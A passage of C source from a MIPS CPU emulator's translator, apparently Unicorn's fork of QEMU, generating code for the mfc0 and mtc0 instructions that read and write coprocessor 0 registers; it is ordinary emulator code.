            gen_mfc0_load64(ctx, arg, offsetof(CPUMIPSState, CP0_VPESchedule));
            rn = "VPESchedule";
            break;
        case 6:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_mfc0_load64(ctx, arg, offsetof(CPUMIPSState, CP0_VPEScheFBack));
            rn = "VPEScheFBack";
            break;
        case 7:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEOpt));
            rn = "VPEOpt";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 2:
        switch (sel) {
        case 0:
            tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo0));
#if defined(TARGET_MIPS64)
            if (ctx->rxi) {
                /* Fold the RI/XI bits (63:62) down into the 32-bit view. */
                TCGv tmp = tcg_temp_new(tcg_ctx);
                tcg_gen_andi_tl(tcg_ctx, tmp, arg, (3ull << 62));
                tcg_gen_shri_tl(tcg_ctx, tmp, tmp, 32);
                tcg_gen_or_tl(tcg_ctx, arg, arg, tmp);
                tcg_temp_free(tcg_ctx, tmp);
            }
#endif
            tcg_gen_ext32s_tl(tcg_ctx, arg, arg);
            rn = "EntryLo0";
            break;
        case 1:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_helper_mfc0_tcstatus(tcg_ctx, arg, tcg_ctx->cpu_env);
            rn = "TCStatus";
            break;
        case 2:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_helper_mfc0_tcbind(tcg_ctx, arg, tcg_ctx->cpu_env);
            rn = "TCBind";
            break;
        case 3:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_helper_mfc0_tcrestart(tcg_ctx, arg, tcg_ctx->cpu_env);
            rn = "TCRestart";
            break;
        case 4:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_helper_mfc0_tchalt(tcg_ctx, arg, tcg_ctx->cpu_env);
            rn = "TCHalt";
            break;
        case 5:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_helper_mfc0_tccontext(tcg_ctx, arg, tcg_ctx->cpu_env);
            rn = "TCContext";
            break;
        case 6:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_helper_mfc0_tcschedule(tcg_ctx, arg, tcg_ctx->cpu_env);
            rn = "TCSchedule";
            break;
        case 7:
            CP0_CHECK(ctx->insn_flags & ASE_MT);
            gen_helper_mfc0_tcschefback(tcg_ctx, arg, tcg_ctx->cpu_env);
            rn = "TCScheFBack";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 3:
        switch (sel) {
        case 0:
            tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo1));
#if defined(TARGET_MIPS64)
            if (ctx->rxi) {
                /* Same RI/XI folding as EntryLo0 above. */
                TCGv tmp = tcg_temp_new(tcg_ctx);
                tcg_gen_andi_tl(tcg_ctx, tmp, arg, (3ull << 62));
                tcg_gen_shri_tl(tcg_ctx, tmp, tmp, 32);
                tcg_gen_or_tl(tcg_ctx, arg, arg, tmp);
                tcg_temp_free(tcg_ctx, tmp);
            }
#endif
            tcg_gen_ext32s_tl(tcg_ctx, arg, arg);
            rn = "EntryLo1";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 4:
        switch (sel) {
        case 0:
            tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_Context));
            tcg_gen_ext32s_tl(tcg_ctx, arg, arg);
            rn = "Context";
            break;
        case 1:
//            gen_helper_mfc0_contextconfig(arg); /* SmartMIPS ASE */
            rn = "ContextConfig";
            goto cp0_unimplemented;
//            break;
        case 2:
            CP0_CHECK(ctx->ulri);
            tcg_gen_ld32s_tl(tcg_ctx, arg, tcg_ctx->cpu_env,
                             offsetof(CPUMIPSState, active_tc.CP0_UserLocal));
            rn = "UserLocal";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 5:
        switch (sel) {
        case 0:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_PageMask));
            rn = "PageMask";
            break;
        case 1:
            check_insn(ctx, ISA_MIPS32R2);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_PageGrain));
            rn = "PageGrain";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 6:
        switch (sel) {
        case 0:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Wired));
            rn = "Wired";
            break;
        case 1:
            check_insn(ctx, ISA_MIPS32R2);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf0));
            rn = "SRSConf0";
            break;
        case 2:
            check_insn(ctx, ISA_MIPS32R2);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf1));
            rn = "SRSConf1";
            break;
        case 3:
            check_insn(ctx, ISA_MIPS32R2);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf2));
            rn = "SRSConf2";
            break;
        case 4:
            check_insn(ctx, ISA_MIPS32R2);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf3));
            rn = "SRSConf3";
            break;
        case 5:
            check_insn(ctx, ISA_MIPS32R2);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf4));
            rn = "SRSConf4";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 7:
        switch (sel) {
        case 0:
            check_insn(ctx, ISA_MIPS32R2);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_HWREna));
            rn = "HWREna";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 8:
        switch (sel) {
        case 0:
            tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_BadVAddr));
            tcg_gen_ext32s_tl(tcg_ctx, arg, arg);
            rn = "BadVAddr";
            break;
        case 1:
            CP0_CHECK(ctx->bi);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_BadInstr));
            rn = "BadInstr";
            break;
        case 2:
            CP0_CHECK(ctx->bp);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_BadInstrP));
            rn = "BadInstrP";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 9:
        switch (sel) {
        case 0:
            /* Mark as an IO operation because we read the time. */
            //if (use_icount)
            //    gen_io_start();
            gen_helper_mfc0_count(tcg_ctx, arg, tcg_ctx->cpu_env);
            //if (use_icount) {
            //    gen_io_end();
            //}
            /* Break the TB to be able to take timer interrupts immediately
               after reading count. */
            ctx->bstate = BS_STOP;
            rn = "Count";
            break;
        /* 6,7 are implementation dependent */
        default:
            goto cp0_unimplemented;
        }
        break;
    case 10:
        switch (sel) {
        case 0:
            tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryHi));
            tcg_gen_ext32s_tl(tcg_ctx, arg, arg);
            rn = "EntryHi";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 11:
        switch (sel) {
        case 0:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Compare));
            rn = "Compare";
            break;
        /* 6,7 are implementation dependent */
        default:
            goto cp0_unimplemented;
        }
        break;
    case 12:
        switch (sel) {
        case 0:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Status));
            rn = "Status";
            break;
        case 1:
            check_insn(ctx, ISA_MIPS32R2);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_IntCtl));
            rn = "IntCtl";
            break;
        case 2:
            check_insn(ctx, ISA_MIPS32R2);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSCtl));
            rn = "SRSCtl";
            break;
        case 3:
            check_insn(ctx, ISA_MIPS32R2);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap));
            rn = "SRSMap";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 13:
        switch (sel) {
        case 0:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Cause));
            rn = "Cause";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 14:
        switch (sel) {
        case 0:
            tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EPC));
            tcg_gen_ext32s_tl(tcg_ctx, arg, arg);
            rn = "EPC";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 15:
        switch (sel) {
        case 0:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_PRid));
            rn = "PRid";
            break;
        case 1:
            check_insn(ctx, ISA_MIPS32R2);
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_EBase));
            rn = "EBase";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 16:
        switch (sel) {
        case 0:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config0));
            rn = "Config";
            break;
        case 1:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config1));
            rn = "Config1";
            break;
        case 2:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config2));
            rn = "Config2";
            break;
        case 3:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config3));
            rn = "Config3";
            break;
        case 4:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config4));
            rn = "Config4";
            break;
        case 5:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config5));
            rn = "Config5";
            break;
        /* 6,7 are implementation dependent */
        case 6:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config6));
            rn = "Config6";
            break;
        case 7:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config7));
            rn = "Config7";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 17:
        switch (sel) {
        case 0:
            gen_helper_mfc0_lladdr(tcg_ctx, arg, tcg_ctx->cpu_env);
            rn = "LLAddr";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 18:
        switch (sel) {
        case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
            gen_helper_1e0i(tcg_ctx, mfc0_watchlo, arg, sel);
            rn = "WatchLo";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 19:
        switch (sel) {
        case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
            gen_helper_1e0i(tcg_ctx, mfc0_watchhi, arg, sel);
            rn = "WatchHi";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 20:
        switch (sel) {
        case 0:
#if defined(TARGET_MIPS64)
            check_insn(ctx, ISA_MIPS3);
            tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_XContext));
            tcg_gen_ext32s_tl(tcg_ctx, arg, arg);
            rn = "XContext";
            break;
#endif
        default:
            goto cp0_unimplemented;
        }
        break;
    case 21:
        /* Officially reserved, but sel 0 is used for R1x000 framemask */
        CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6));
        switch (sel) {
        case 0:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Framemask));
            rn = "Framemask";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 22:
        tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */
        rn = "'Diagnostic"; /* implementation dependent */
        break;
    case 23:
        switch (sel) {
        case 0:
            gen_helper_mfc0_debug(tcg_ctx, arg, tcg_ctx->cpu_env); /* EJTAG support */
            rn = "Debug";
            break;
        /* sels 1-4 are PDtrace registers: not implemented, so the cases
           deliberately fall through into cp0_unimplemented below. */
        case 1:
//            gen_helper_mfc0_tracecontrol(arg); /* PDtrace support */
            rn = "TraceControl";
//            break;
        case 2:
//            gen_helper_mfc0_tracecontrol2(arg); /* PDtrace support */
            rn = "TraceControl2";
//            break;
        case 3:
//            gen_helper_mfc0_usertracedata(arg); /* PDtrace support */
            rn = "UserTraceData";
//            break;
        case 4:
//            gen_helper_mfc0_tracebpc(arg); /* PDtrace support */
            rn = "TraceBPC";
//            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 24:
        switch (sel) {
        case 0:
            /* EJTAG support */
            tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC));
            tcg_gen_ext32s_tl(tcg_ctx, arg, arg);
            rn = "DEPC";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 25:
        switch (sel) {
        case 0:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Performance0));
            rn = "Performance0";
            break;
        /* The remaining performance counters are not implemented; the
           cases fall through into cp0_unimplemented below. */
        case 1:
//            gen_helper_mfc0_performance1(arg);
            rn = "Performance1";
//            break;
        case 2:
//            gen_helper_mfc0_performance2(arg);
            rn = "Performance2";
//            break;
        case 3:
//            gen_helper_mfc0_performance3(arg);
            rn = "Performance3";
//            break;
        case 4:
//            gen_helper_mfc0_performance4(arg);
            rn = "Performance4";
//            break;
        case 5:
//            gen_helper_mfc0_performance5(arg);
            rn = "Performance5";
//            break;
        case 6:
//            gen_helper_mfc0_performance6(arg);
            rn = "Performance6";
//            break;
        case 7:
//            gen_helper_mfc0_performance7(arg);
            rn = "Performance7";
//            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 26:
        tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */
        rn = "ECC";
        break;
    case 27:
        switch (sel) {
        case 0: case 1: case 2: case 3:
            tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */
            rn = "CacheErr";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 28:
        switch (sel) {
        case 0:
        case 2:
        case 4:
        case 6:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_TagLo));
            rn = "TagLo";
            break;
        case 1:
        case 3:
        case 5:
        case 7:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_DataLo));
            rn = "DataLo";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 29:
        switch (sel) {
        case 0:
        case 2:
        case 4:
        case 6:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_TagHi));
            rn = "TagHi";
            break;
        case 1:
        case 3:
        case 5:
        case 7:
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_DataHi));
            rn = "DataHi";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 30:
        switch (sel) {
        case 0:
            tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC));
            tcg_gen_ext32s_tl(tcg_ctx, arg, arg);
            rn = "ErrorEPC";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    case 31:
        switch (sel) {
        case 0:
            /* EJTAG support */
            gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE));
            rn = "DESAVE";
            break;
        case 2: case 3: case 4: case 5: case 6: case 7:
            CP0_CHECK(ctx->kscrexist & (1 << sel));
            tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env,
                          offsetof(CPUMIPSState, CP0_KScratch[sel-2]));
            tcg_gen_ext32s_tl(tcg_ctx, arg, arg);
            rn = "KScratch";
            break;
        default:
            goto cp0_unimplemented;
        }
        break;
    default:
        goto cp0_unimplemented;
    }
    (void)rn; /* avoid a compiler warning */
    LOG_DISAS("mfc0 %s (reg %d sel %d)\n", rn, reg, sel);
    return;

cp0_unimplemented:
    LOG_DISAS("mfc0 %s (reg %d sel %d)\n", rn, reg, sel);
    gen_mfc0_unimplemented(ctx, arg);
}

/*
 * MTC0: move to coprocessor 0.  Emits the write of 'arg' into CP0
 * register (reg, sel).  Writes that change execution state end the TB.
 */
static void gen_mtc0(DisasContext *ctx, TCGv arg, int reg, int sel)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    const char *rn = "invalid";

    if (sel != 0)
        check_insn(ctx, ISA_MIPS32);

    //if
(use_icount) + // gen_io_start(); + + switch (reg) { + case 0: + switch (sel) { + case 0: + gen_helper_mtc0_index(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Index"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_mvpcontrol(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "MVPControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + /* ignored */ + rn = "MVPConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + /* ignored */ + rn = "MVPConf1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 1: + switch (sel) { + case 0: + /* ignored */ + rn = "Random"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpecontrol(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpeconf0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpeconf1(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEConf1"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_yqmask(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "YQMask"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mtc0_store64(ctx, arg, offsetof(CPUMIPSState, CP0_VPESchedule)); + rn = "VPESchedule"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mtc0_store64(ctx, arg, offsetof(CPUMIPSState, CP0_VPEScheFBack)); + rn = "VPEScheFBack"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpeopt(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEOpt"; + break; + default: + goto cp0_unimplemented; + } + break; + case 2: + switch (sel) { + case 0: + gen_helper_mtc0_entrylo0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EntryLo0"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcstatus(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCStatus"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + 
gen_helper_mtc0_tcbind(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCBind"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcrestart(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCRestart"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tchalt(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCHalt"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tccontext(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCContext"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcschedule(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCSchedule"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcschefback(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCScheFBack"; + break; + default: + goto cp0_unimplemented; + } + break; + case 3: + switch (sel) { + case 0: + gen_helper_mtc0_entrylo1(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EntryLo1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 4: + switch (sel) { + case 0: + gen_helper_mtc0_context(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Context"; + break; + case 1: +// gen_helper_mtc0_contextconfig(tcg_ctx->cpu_env, arg); /* SmartMIPS ASE */ + rn = "ContextConfig"; + goto cp0_unimplemented; +// break; + case 2: + CP0_CHECK(ctx->ulri); + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); + rn = "UserLocal"; + break; + default: + goto cp0_unimplemented; + } + break; + case 5: + switch (sel) { + case 0: + gen_helper_mtc0_pagemask(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "PageMask"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_pagegrain(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "PageGrain"; + break; + default: + goto cp0_unimplemented; + } + break; + case 6: + switch (sel) { + case 0: + gen_helper_mtc0_wired(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Wired"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf0(tcg_ctx, 
tcg_ctx->cpu_env, arg); + rn = "SRSConf0"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf1(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf1"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf2(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf2"; + break; + case 4: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf3(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf3"; + break; + case 5: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf4(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf4"; + break; + default: + goto cp0_unimplemented; + } + break; + case 7: + switch (sel) { + case 0: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_hwrena(tcg_ctx, tcg_ctx->cpu_env, arg); + ctx->bstate = BS_STOP; + rn = "HWREna"; + break; + default: + goto cp0_unimplemented; + } + break; + case 8: + switch (sel) { + case 0: + /* ignored */ + rn = "BadVAddr"; + break; + case 1: + /* ignored */ + rn = "BadInstr"; + break; + case 2: + /* ignored */ + rn = "BadInstrP"; + break; + default: + goto cp0_unimplemented; + } + break; + case 9: + switch (sel) { + case 0: + gen_helper_mtc0_count(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Count"; + break; + /* 6,7 are implementation dependent */ + default: + goto cp0_unimplemented; + } + break; + case 10: + switch (sel) { + case 0: + gen_helper_mtc0_entryhi(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EntryHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 11: + switch (sel) { + case 0: + gen_helper_mtc0_compare(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Compare"; + break; + /* 6,7 are implementation dependent */ + default: + goto cp0_unimplemented; + } + break; + case 12: + switch (sel) { + case 0: + save_cpu_state(ctx, 1); + gen_helper_mtc0_status(tcg_ctx, tcg_ctx->cpu_env, arg); + /* BS_STOP isn't good enough here, hflags may have changed. 
*/ + gen_save_pc(ctx, ctx->pc + 4); + ctx->bstate = BS_EXCP; + rn = "Status"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_intctl(tcg_ctx, tcg_ctx->cpu_env, arg); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "IntCtl"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsctl(tcg_ctx, tcg_ctx->cpu_env, arg); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "SRSCtl"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_mtc0_store32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "SRSMap"; + break; + default: + goto cp0_unimplemented; + } + break; + case 13: + switch (sel) { + case 0: + save_cpu_state(ctx, 1); + gen_helper_mtc0_cause(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Cause"; + break; + default: + goto cp0_unimplemented; + } + break; + case 14: + switch (sel) { + case 0: + gen_mtc0_store64(ctx, arg, offsetof(CPUMIPSState, CP0_EPC)); + rn = "EPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 15: + switch (sel) { + case 0: + /* ignored */ + rn = "PRid"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_ebase(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EBase"; + break; + default: + goto cp0_unimplemented; + } + break; + case 16: + switch (sel) { + case 0: + gen_helper_mtc0_config0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case 1: + /* ignored, read only */ + rn = "Config1"; + break; + case 2: + gen_helper_mtc0_config2(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config2"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case 3: + /* ignored, read only */ + rn = "Config3"; + break; + case 4: + 
gen_helper_mtc0_config4(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config4"; + ctx->bstate = BS_STOP; + break; + case 5: + gen_helper_mtc0_config5(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config5"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + /* 6,7 are implementation dependent */ + case 6: + /* ignored */ + rn = "Config6"; + break; + case 7: + /* ignored */ + rn = "Config7"; + break; + default: + rn = "Invalid config selector"; + goto cp0_unimplemented; + } + break; + case 17: + switch (sel) { + case 0: + gen_helper_mtc0_lladdr(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "LLAddr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 18: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_0e1i(tcg_ctx, mtc0_watchlo, arg, sel); + rn = "WatchLo"; + break; + default: + goto cp0_unimplemented; + } + break; + case 19: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_0e1i(tcg_ctx, mtc0_watchhi, arg, sel); + rn = "WatchHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 20: + switch (sel) { + case 0: +#if defined(TARGET_MIPS64) + check_insn(ctx, ISA_MIPS3); + gen_helper_mtc0_xcontext(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "XContext"; + break; +#endif + default: + goto cp0_unimplemented; + } + break; + case 21: + /* Officially reserved, but sel 0 is used for R1x000 framemask */ + CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); + switch (sel) { + case 0: + gen_helper_mtc0_framemask(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Framemask"; + break; + default: + goto cp0_unimplemented; + } + break; + case 22: + /* ignored */ + rn = "Diagnostic"; /* implementation dependent */ + break; + case 23: + switch (sel) { + case 0: + gen_helper_mtc0_debug(tcg_ctx, tcg_ctx->cpu_env, arg); /* EJTAG support */ + /* BS_STOP isn't good enough here, hflags may have changed. 
*/ + gen_save_pc(ctx, ctx->pc + 4); + ctx->bstate = BS_EXCP; + rn = "Debug"; + break; + case 1: +// gen_helper_mtc0_tracecontrol(tcg_ctx->cpu_env, arg); /* PDtrace support */ + rn = "TraceControl"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; +// break; + case 2: +// gen_helper_mtc0_tracecontrol2(tcg_ctx->cpu_env, arg); /* PDtrace support */ + rn = "TraceControl2"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; +// break; + case 3: + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; +// gen_helper_mtc0_usertracedata(tcg_ctx->cpu_env, arg); /* PDtrace support */ + rn = "UserTraceData"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; +// break; + case 4: +// gen_helper_mtc0_tracebpc(tcg_ctx->cpu_env, arg); /* PDtrace support */ + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "TraceBPC"; +// break; + default: + goto cp0_unimplemented; + } + break; + case 24: + switch (sel) { + case 0: + /* EJTAG support */ + gen_mtc0_store64(ctx, arg, offsetof(CPUMIPSState, CP0_DEPC)); + rn = "DEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 25: + switch (sel) { + case 0: + gen_helper_mtc0_performance0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Performance0"; + break; + case 1: +// gen_helper_mtc0_performance1(arg); + rn = "Performance1"; +// break; + case 2: +// gen_helper_mtc0_performance2(arg); + rn = "Performance2"; +// break; + case 3: +// gen_helper_mtc0_performance3(arg); + rn = "Performance3"; +// break; + case 4: +// gen_helper_mtc0_performance4(arg); + rn = "Performance4"; +// break; + case 5: +// gen_helper_mtc0_performance5(arg); + rn = "Performance5"; +// break; + case 6: +// gen_helper_mtc0_performance6(arg); + rn = "Performance6"; +// break; + case 7: +// gen_helper_mtc0_performance7(arg); + rn = "Performance7"; +// 
